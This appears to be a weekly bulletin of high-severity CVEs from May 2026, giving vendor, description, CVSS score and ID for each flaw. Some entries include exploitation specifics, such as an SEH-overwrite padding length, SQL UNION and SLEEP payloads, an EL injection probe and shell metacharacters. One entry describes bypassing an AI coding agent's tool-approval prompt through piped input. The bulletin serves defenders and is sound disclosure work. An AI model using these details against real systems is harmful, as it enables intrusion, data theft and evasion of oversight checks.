Vulnerability Summary for the Week of May 18, 2026

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source Info
10-Strike–Network Inventory Explorer 10-Strike Network Inventory Explorer 8.54 contains a stack-based buffer overflow vulnerability in the registration key input field that allows local attackers to execute arbitrary code by triggering a structured exception handler overwrite. Attackers can craft a malicious registration key string with 4188 bytes of padding followed by SEH chain values and shellcode, then paste it into the registration dialog to achieve code execution with application privileges. 2026-05-23 8.4 CVE-2018-25344
10-Strike–Network Scanner 10-Strike Network Scanner 3.0 contains a local buffer overflow vulnerability in the host name field that allows attackers to bypass SafeSEH protections and execute arbitrary code. Attackers can craft a malicious payload in the host name or address field and trigger the vulnerability through the Trace route or System information functions to achieve code execution. 2026-05-23 8.4 CVE-2018-25345
10Web–Form Maker WordPress Form Maker Plugin 1.12.24 and below contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through the FormMakerSQLMapping and generete_csv actions. Attackers can submit POST requests with malicious SQL payloads in the name and search_labels parameters to extract, modify, or escalate privileges within the WordPress database. 2026-05-23 7.1 CVE-2018-25346
acyba–AcyMailing An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 10.8.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify privileged AcyMailing configuration, export subscriber secret keys, and chain these actions into administrator account takeover when a target administrator email address is known. 2026-05-20 8.8 CVE-2026-5200
Alinto–SOGo Webmail SOGo versions 5.12.7 and prior contains a SQL injection vulnerability in the Access Control List management functionality that allows authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint. Attackers can inject malicious SQL code to write extracted data into the sogo_acl table and retrieve it through the /acls API, establishing an out-of-band data exfiltration channel. 2026-05-18 8.1 CVE-2026-8851
Audiograbber–Audiograbber Audiograbber 1.83 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious input in the Interpret or Album fields that triggers a buffer overflow, overwriting SEH pointers and executing injected shellcode with application privileges. 2026-05-23 8.4 CVE-2018-25355
AWS–Amazon Braket Python SDK Insecure deserialization in the job results processing component in Amazon Braket SDK before 1.117.0 might allow a remote authenticated user with S3 write access to the job output bucket to achieve arbitrary code execution on any machine that processes job results. We recommend you upgrade to amazon-braket-sdk version 1.117.0 or later. 2026-05-22 7.1 CVE-2026-9291
AWS–Amazon Redshift connector for Python Unsafe use of Python’s eval() on server-received data in the vector_in() function in amazon-redshift-python-driver before 2.1.14 allows a rogue server or man-in-the-middle actor to execute arbitrary code on the client. To remediate this issue, users should upgrade to version 2.1.14. 2026-05-18 9.8 CVE-2026-8838
AWS–Kiro CLI Missing input source validation in the tool authorization prompt in Kiro CLI before 1.28.0 allows a local attacker to execute arbitrary tools, including shell commands, without user approval by crafting content that is piped to kiro-cli via stdin. We recommend you to upgrade to kiro-cli version 1.28.0 or later. 2026-05-22 7.8 CVE-2026-9255
AWS–RabbitMQ AWS Active debug code exists in the ARN resolver of amazon-mq rabbitmq-aws before version 0.2.1. A debug ARN scheme (arn:aws-debug:file) accepted by the PUT /api/aws/arn/validate validation endpoint might allow remote authenticated users to perform arbitrary file reads on any file accessible to the RabbitMQ process. To remediate this issue, customers should upgrade to version 0.2.1 of rabbitmq-aws. If RabbitMQ is configured to use TLS for connections, we also recommend rotating any associated private certificate keys. 2026-05-20 7.7 CVE-2026-9133
baptisteArno–typebot.io Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the preview chat endpoint (POST /api/v1/typebots/{typebotId}/preview/startChat) allows unauthenticated users to achieve Server-Side Request Forgery (SSRF) by supplying a custom typebot definition with server-side code blocks. The fetch function exposed inside the isolated-vm sandbox calls Node.js native fetch without the SSRF validation (validateHttpReqUrl) that protects the HTTP Request block. This bypasses all SSRF mitigations added after GHSA-8gq9-rw7v-3jpr. Exploitation of this unauthenticated SSRF vulnerability can lead to cloud credential theft, internal network access and data exfiltration for any self-hosted Typebot deployments and hosted services. This issue has been fixed in version 3.16.0. 2026-05-22 10 CVE-2026-33712
baptisteArno–typebot.io Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid’s innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder’s own origin (builder.typebot.io) under a CSP permitting ‘unsafe-inline’, a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder’s authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0. 2026-05-22 8.7 CVE-2026-28445
baptisteArno–typebot.io TypeBot is a chatbot builder tool. In versions prior to 3.16.0, SSRF protection for Webhook / HTTP Request blocks validates only the URL string, blocked hostname literals, and literal IP formats. It does not resolve DNS before allowing the request. As a result, a hostname such as ssrf-repro.example that resolves to 127.0.0.1, 169.254.169.254, or RFC1918/private space passes validation and is later fetched by the backend HTTP client. This enables server-side request forgery to loopback, cloud metadata, and private network targets. This issue has been resolved in version 3.16.0. 2026-05-22 7.6 CVE-2026-34207
baptisteArno–typebot.io TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain an SSRF via Open Redirect Bypass as the HTTP Request block and Code block validate the initial request URL via validateHttpReqUrl() to block private IPs and cloud metadata hostnames. However, the HTTP clients (ky and fetch) follow 302 redirects without re-validating the redirect destination. An authenticated user can point a bot block to an attacker-controlled server that responds with a redirect to an internal IP, causing the Typebot server to reach internal services. An authenticated Typebot user can reach AWS metadata (169.254.169.254), private subnets, and container-internal services. Exploitable to extract cloud IAM credentials or probe internal APIs inaccessible from the internet. This issue has been fixed in version 3.16.0. 2026-05-22 7.7 CVE-2026-39965
baptisteArno–typebot.io TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the fix for GHSA-4xc5-wfwc-jw47 (“Credential Theft via Client-Side Script Execution and API Authorization Bypass”) is incomplete. While the builder’s getCredentials tRPC endpoint was patched with workspace membership checks, the bot-engine runtime still allows any authenticated user to use credentials from any workspace via the preview chat endpoint. The bot-engine’s getCredentials() utility function uses a falsy check (if (workspaceId && …)) for workspace ownership validation. Since the preview endpoint accepts a client-controlled workspaceId field and the Zod schema allows empty strings, an attacker can supply workspaceId: “” to bypass credential ownership verification entirely. Exploitation can result in credential exfiltration, external service abuse, financial damage and a data breach. 2026-05-22 7.1 CVE-2026-39968
Basamak Information Technology Consulting and Organization Trade Ltd. Co.–DernekWeb Improper neutralization of input during web page generation (‘cross-site scripting’) vulnerability in Basamak Information Technology Consulting and Organization Trade Ltd. Co. DernekWeb allows Stored XSS. This issue affects DernekWeb: through 30122025. 2026-05-18 8.8 CVE-2026-7498
Behance–Smartshop Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to category.php with UNION-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and other data. 2026-05-23 8.2 CVE-2018-25340
Behance–Smartshop Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to product.php with union-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and database names. 2026-05-23 8.2 CVE-2018-25341
Behance–Smartshop Smartshop 1 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the ‘searched’ parameter in search.php. Attackers can send GET requests with malicious SQL payloads like SLEEP commands to extract sensitive database information including product details and system data. 2026-05-23 8.2 CVE-2018-25342
BerriAI–litellm LiteLLM prior to 1.83.14 allows an authenticated internal_user to create API keys with access to routes that their role does not permit. When generating a key, the allowed_routes field is stored without verifying that the specified routes fall within the user’s own permissions. A key created with access to admin-only routes can then be used to reach those routes successfully, bypassing the role-based access controls that would otherwise block the request, enabling full privilege escalation from internal_user to proxy_admin. 2026-05-21 8.8 CVE-2026-47101
BerriAI–litellm LiteLLM prior to 1.83.10 allows a user to modify their own user_role via the /user/update endpoint. While the endpoint correctly restricts users to updating only their own account, it does not restrict which fields may be changed. A user who can reach this endpoint can set their role to proxy_admin, gaining full administrative access to LiteLLM including all users, teams, keys, models, and prompt history. Users with the org_admin role have legitimate access to this endpoint and can exploit this vulnerability without chaining any additional flaw. 2026-05-21 8.8 CVE-2026-47102
Besen–BS20 EV Charging Station A weakness has been identified in Besen BS20 EV Charging Station up to 20260426. Affected by this issue is some unknown functionality of the component OTA Update Installation Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The original disclosure mentions, that “[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026.” 2026-05-24 8.1 CVE-2026-9397
bestpractical–rt RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.0 through 5.0.9 and 6.0.0 through 6.0.2 contain an SQL injection vulnerability. An authenticated user can craft input that is incorporated into database queries without proper validation, potentially allowing them to read or modify data in the RT database. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by restricting RT account access to trusted users. 2026-05-22 8.8 CVE-2026-41075
bestpractical–rt RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.9 and prior in addition to 6.0.0 through 6.0.2 contain an authentication bypass vulnerability in RT installations that use LDAP/AD for user authentication. Under certain LDAP server configurations, an attacker may be able to authenticate as any LDAP-backed RT user without supplying valid credentials. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by reviewing their LDAP server’s authentication policy to ensure it rejects unauthenticated bind attempts. Upgrading RT remains the recommended fix. 2026-05-22 8.1 CVE-2026-41076
bestpractical–rt RT is an open source, enterprise-grade issue and ticket tracking system. Versions 6.0.0 through 6.0.2 contain a Cross-Site Request Forgery (CSRF) vulnerability. An attacker who can induce a logged-in RT user to visit a malicious web page can trigger arbitrary state-changing actions in RT on that user’s behalf. This issue has been fixed in version 6.0.3. 2026-05-22 7.1 CVE-2026-41074
Beyaz Computer Software Design Industry and Trade Ltd. Co.–CityPLus Improper neutralization of input during web page generation (‘cross-site scripting’) vulnerability in Beyaz Computer Software Design Industry and Trade Ltd. Co. CityPLus allows Reflected XSS. This issue affects CityPLus: before V24.29750.1.0. 2026-05-20 7.6 CVE-2026-5783
beycanpress–Account Switcher The Account Switcher plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.2. This is due to the `rememberLogin` REST API endpoint using a loose comparison (`!=` instead of `!==`) for secret validation at `app/RestAPI.php:111`, combined with no validation that the secret is non-empty. When a target user has never used the “Remember me” feature, their `asSecret` user meta does not exist, causing `get_user_meta()` to return an empty string. An attacker can send an empty `secret` parameter, which passes the comparison (`'' != ''` is `false`), and the endpoint then calls `wp_set_auth_cookie()` for the target user. Additionally, all REST routes use `permission_callback => '__return_true'` with no capability checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to switch to any user account including Administrator, ultimately granting themselves full administrative privileges. 2026-05-20 8.8 CVE-2026-6456
Cisco–Cisco Secure Workload A vulnerability in the access validation of internal REST APIs of Cisco Secure Workload could allow an unauthenticated, remote attacker to access site resources with the privileges of the Site Admin role. This vulnerability is due to insufficient validation and authentication when accessing REST API endpoints. An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint. A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user. 2026-05-20 10 CVE-2026-20223
ConnectWise–Automate The ConnectWise Automate™ Agent does not fully verify the authenticity of components obtained during plugin loading and self-update operations. This issue is addressed in Automate 2026.5. 2026-05-21 8.8 CVE-2026-9089
constantcontact–Creative Mail Easier WordPress & WooCommerce Email Marketing The Creative Mail – Easier WordPress & WooCommerce Email Marketing plugin for WordPress is vulnerable to SQL Injection via the ‘checkout_uuid’ parameter in all versions up to, and including, 1.6.9. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `has_checkout_consent()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2026-05-20 7.5 CVE-2026-3985
contest-gallery–Contest Gallery Upload & Vote Photos, Media, Sell with PayPal & Stripe The Contest Gallery plugin for WordPress is vulnerable to SQL Injection via the ‘form_input’ parameter in versions up to, and including, 28.1.6. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query inside the unauthenticated ‘post_cg_gallery_form_upload’ AJAX action (specifically the ‘cb’ branch of the included users-upload-check.php, where $f_input_id is concatenated unquoted into ‘SELECT Field_Content FROM … WHERE id = $f_input_id’). The endpoint is gated only by a public frontend nonce (‘cg1l_action’ / ‘cg_nonce’) that is exposed in the page source of any public gallery page. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2026-05-19 7.5 CVE-2026-8912
cssigniterteam–AudioIgniter Music Player The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the handle_playlist_endpoint() function (hooked to template_redirect) accepting a user-controlled playlist ID via the audioigniter_playlist_id query var or the /audioigniter/playlist/{id}/ rewrite rule and returning playlist track data without performing any authentication, capability, or post_status check – only the post_type is validated. This makes it possible for unauthenticated attackers to view track metadata (titles, artists, audio URLs, buy links, download URLs, and cover images) of any playlist on the site, including those in draft, private, pending, or trash status. 2026-05-22 7.5 CVE-2026-8679
Ctrlpanel-gg–panel CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer (public/installer/index.php) is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler files, leaving installer endpoints reachable on already-installed instances. The handlers also pass unsanitized user input directly into shell commands, allowing an attacker to submit crafted requests that execute arbitrary commands on the server. The vulnerability stems from two combined weaknesses: (1) premature form handler execution before the lock file gate, and (2) unsafe use of user input in shell command construction. This issue is reported to be actively exploited in the wild. The issue has been fixed in version 1.2.0. 2026-05-19 10 CVE-2026-34234
Ctrlpanel-gg–panel CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade’s {!! !!} syntax in the recipient’s browser. The flaw exists in both AppNotificationsTicketAdminAdminReplyNotification (triggered when a user replies, targeting admins) and AppNotificationsTicketUserReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim’s session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim’s behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0. 2026-05-19 8.7 CVE-2026-34241
Ctrlpanel-gg–panel CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH requests. Controllers missing checks on the write methods store() and update() include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write); ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request. An authenticated attacker without admin write privileges can issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts including roles, credits, passwords, and linked Pterodactyl IDs to achieve full privilege escalation, as well as abuse logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0. 2026-05-19 8.1 CVE-2026-34358
D-Link–DIR-601 D-Link DIR601 2.02NA contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve sensitive configuration data by manipulating the table_name parameter in POST requests. Attackers can send requests to /my_cgi.cgi with table_name values like admin_user, wireless_settings, and wireless_security to extract administrative credentials and wireless network keys in clear text. 2026-05-23 7.5 CVE-2018-25358
Dell–PowerFlex Manager (Appliance) Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. 2026-05-20 7.5 CVE-2025-32750
Digital Operations Services Inc.–WifiBurada Exposure of private personal information to an unauthorized actor, Insufficiently Protected Credentials vulnerability in Digital Operations Services Inc. WifiBurada allows Authentication Bypass. This issue affects WifiBurada: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-21 7.1 CVE-2025-13477
Divi Engine–Divi Form Builder The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled ‘role’ parameter from POST data during user registration without validating it against the form’s configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration. 2026-05-21 9.8 CVE-2026-5118
Docker–Docker Desktop The vllm-metal inference backend in Docker Model Runner on macOS unconditionally sets trust_remote_code=True when loading model tokenizers, and runs without sandboxing. This causes transformers.AutoTokenizer.from_pretrained() to import and execute arbitrary Python files included in any model pulled from an OCI registry, resulting in arbitrary code execution on the Docker host as the Docker Desktop user when inference is triggered. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model and request inference. 2026-05-22 8.2 CVE-2026-5817
Docker–Docker Desktop The MLX inference backend in Docker Model Runner on macOS uses the MLX-LM library, which unconditionally imports and executes arbitrary Python files from model directories via the model_file configuration field in config.json. When a model’s config.json specifies a model_file pointing to a Python file, MLX-LM uses importlib to load and execute it with no trust_remote_code gate or equivalent safety check. The MLX backend runs without sandboxing, resulting in arbitrary code execution on the Docker host as the Docker Desktop user. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model from an attacker-controlled OCI registry and request inference. 2026-05-22 8.2 CVE-2026-5843
Docker–Docker Desktop The Docker CLI –use-api-socket flag bypasses Enhanced Container Isolation (ECI) restrictions in Docker Desktop. When ECI is enabled, Docker socket mounts from containers are denied unless explicitly allowed via the admin-settings configuration. However, the –use-api-socket flag adds the Docker socket mount via the HostConfig.Mounts field rather than the HostConfig.Binds field. The ECI enforcement in the Docker Desktop API proxy only inspected Binds, allowing the mount to pass unchecked. This grants a container full access to the Docker Engine socket and, if the host user has logged in to container registries, their authentication credentials. A local attacker with the ability to run Docker CLI commands can exploit this to escape ECI restrictions, access the Docker Engine, and potentially escalate privileges. 2026-05-22 8.8 CVE-2026-6406
Dokploy–dokploy Dokploy is a free, self-hostable Platform as a Service (PaaS). Versions 0.26.6 and below have OS command injection through the appName parameter. Three chained issues cause this problem: inadequate input sanitization, lack of schema validation, and direct shell interpolation. User-controlled application names are passed through inadequate sanitization (the cleanAppName function only replaces spaces and converts to lowercase) before being interpolated directly into shell commands executed via execAsync() and execAsyncRemote(). An authenticated attacker can inject shell metacharacters (e.g., ;, $(), backticks, |, &) in the appName field during application creation, which are then executed with server-level privileges when service operations (start, stop, remove, scale) are triggered. This issue has been resolved in version 0.26.7. 2026-05-18 9.9 CVE-2026-27130
Dolibarr–Dolibarr ERP CRM Dolibarr ERP CRM 7.0.3 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting PHP code through the db_name parameter. Attackers can send a POST request to install/step1.php with malicious PHP code in the db_name parameter, then execute commands via the check.php endpoint using the cmd GET parameter. 2026-05-23 9.8 CVE-2018-25357
Drupal–Drupal core Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10. 2026-05-20 9.8 CVE-2026-9082
DumbWareio–DumbAssets DumbAssets through 1.0.11 contains a path traversal vulnerability in the POST /api/delete-file endpoint and filesToDelete array parameters that allows unauthenticated attackers to delete arbitrary files by supplying ../ sequences that bypass directory boundary validation. Because the authentication control is optional and disabled by default, attackers can traverse outside the intended application directory and delete critical files such as server.js or package.json, causing complete denial of service. 2026-05-18 9.1 CVE-2026-45230
Eclipse Foundation–Eclipse Glassfish An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish’s Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user. 2026-05-19 9.1 CVE-2026-2586
Eclipse Foundation–Eclipse Glassfish A critical Remote Code Execution (RCE) vulnerability was identified in the server-side template rendering mechanism used by the Glassfish gadget handler. The application processes .xml files and evaluates user-supplied values within a context where Expression Language (EL) “expressions” are processed without proper sanitization or escaping. By injecting expressions such as #{7*7}, the server returns 49, confirming server-side EL evaluation. This issue allows a remote attacker to fully compromise the underlying host, enabling capabilities as reading/modifying data, executing arbitrary commands, persistence, and lateral movement. 2026-05-19 9.6 CVE-2026-2587
Edimax–BR-6428NS A flaw has been found in Edimax BR-6428NS 1.10. This affects the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. This manipulation of the argument L2TPUserName causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-18 8.8 CVE-2026-8775
Edimax–BR-6428NS A vulnerability has been found in Edimax BR-6428NS 1.10. This vulnerability affects the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Such manipulation of the argument pptpUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-18 8.8 CVE-2026-8776
Edimax–BR-6428NS A vulnerability was identified in Edimax BR-6428NS 1.10. The impacted element is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. Such manipulation of the argument pppUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 8.8 CVE-2026-9294
Edimax–BR-6428NS A security flaw has been discovered in Edimax BR-6428NS 1.10. This affects the function formWirelessTbl of the file /goform/formWirelessTbl of the component POST Request Handler. Performing a manipulation of the argument vapurl results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 8.8 CVE-2026-9295
Edimax–BR-6675nD A security vulnerability has been detected in Edimax BR-6675nD 1.12. Affected is the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. Such manipulation of the argument L2TPUserName leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9380
Edimax–BR-6675nD A vulnerability was detected in Edimax BR-6675nD 1.12. Affected by this vulnerability is the function formPPPoESetup of the file /goform/formPPPoESetup of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9381
Edimax–BR-6675nD A flaw has been found in Edimax BR-6675nD 1.12. Affected by this issue is the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Executing a manipulation of the argument pptpUserName can lead to buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9382
Edimax–BR-6675nD A vulnerability was detected in Edimax BR-6675nD 1.12. This vulnerability affects the function formsetPPPoE of the file /goform/formsetPPPoE of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9399
Edimax–BR-6675nD A vulnerability has been found in Edimax BR-6675nD 1.12. Impacted is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. The manipulation of the argument pppUserName leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9401
Edimax–BR-6675nD A vulnerability was determined in Edimax BR-6675nD 1.12. The impacted element is the function formWlSiteSurvey of the file /goform/formWlSiteSurvey of the component POST Request Handler. This manipulation of the argument selSSID causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9403
Edimax–EW-7438RPn A security vulnerability has been detected in Edimax EW-7438RPn up to 1.31. The impacted element is an unknown function of the file /goform/formWpsStart of the component webs. Such manipulation of the argument pinCode/wlan-url leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9344
Edimax–EW-7438RPn A vulnerability was detected in Edimax EW-7438RPn up to 1.31. This affects the function formWizSurvey of the file /goform/formWizSurvey of the component webs. Performing a manipulation of the argument ssid/manualssid/ip/mask/gateway results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9345
Edimax–EW-7438RPn A flaw has been found in Edimax EW-7438RPn up to 1.31. This impacts the function formWirelessTbl of the file /goform/formWirelessTbl of the component webs. Executing a manipulation of the argument submit-url can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9346
Edimax–EW-7438RPn A vulnerability was found in Edimax EW-7438RPn up to 1.31. Affected by this vulnerability is an unknown functionality of the file /goform/mp of the component webs. The manipulation of the argument webs results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9348
Edimax–EW-7438RPn A security flaw has been discovered in Edimax EW-7438RPn 1.28a. Affected by this issue is the function formwlencrypt24g of the file /goform/formwlencrypt24g of the component POST Request Handler. The manipulation of the argument key1 results in buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-24 8.8 CVE-2026-9360
edmonparker–Read More & Accordion The Read More & Accordion plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.5.7. This is due to the ‘RadMoreAjax::importData’ function not restricting which database tables can be written to during import and not properly validating the imported data. This makes it possible for authenticated attackers, with permission granted by the site owner through the plugin’s role settings, to insert arbitrary rows into the ‘wp_users’ and ‘wp_usermeta’ tables, including the ‘wp_capabilities’ field, allowing them to create a new administrator account and gain administrator access to the site. 2026-05-20 8.8 CVE-2026-7467
F5–NGINX JavaScript NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. 2026-05-19 8.1 CVE-2026-8711
F5–NGINX Plus NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when a rewrite directive uses a regex pattern with distinct, overlapping Perl-Compatible Regular Expression (PCRE) captures (for example, ^/((.*))$) and a replacement string that references multiple such captures (for example, $1$2) in a redirect or arguments context. An unauthenticated attacker along with conditions beyond their control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. 2026-05-22 8.1 CVE-2026-9256
FunnelKit–Funnel Builder for WooCommerce Checkout Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin’s External Scripts global setting. Attackers can inject malicious JavaScript through the External Scripts setting that executes in the browsers of all checkout page visitors. 2026-05-19 7.5 CVE-2026-47100
Gmission–Web Fax Improper input validation, Unrestricted upload of file with dangerous type vulnerability in Gmission Web Fax allows Remote Code Inclusion. This issue affects Web Fax: from 3.0 before 3.1. 2026-05-21 8.4 CVE-2026-9157
GNU–GNU SASL In GNU SASL before 2.2.3, DIGEST-MD5 has a NULL pointer dereference affecting both clients and servers, via a known token with no accompanying = character. This occurs in lib/digest-md5/getsubopt.c. 2026-05-24 7.5 CVE-2026-48829
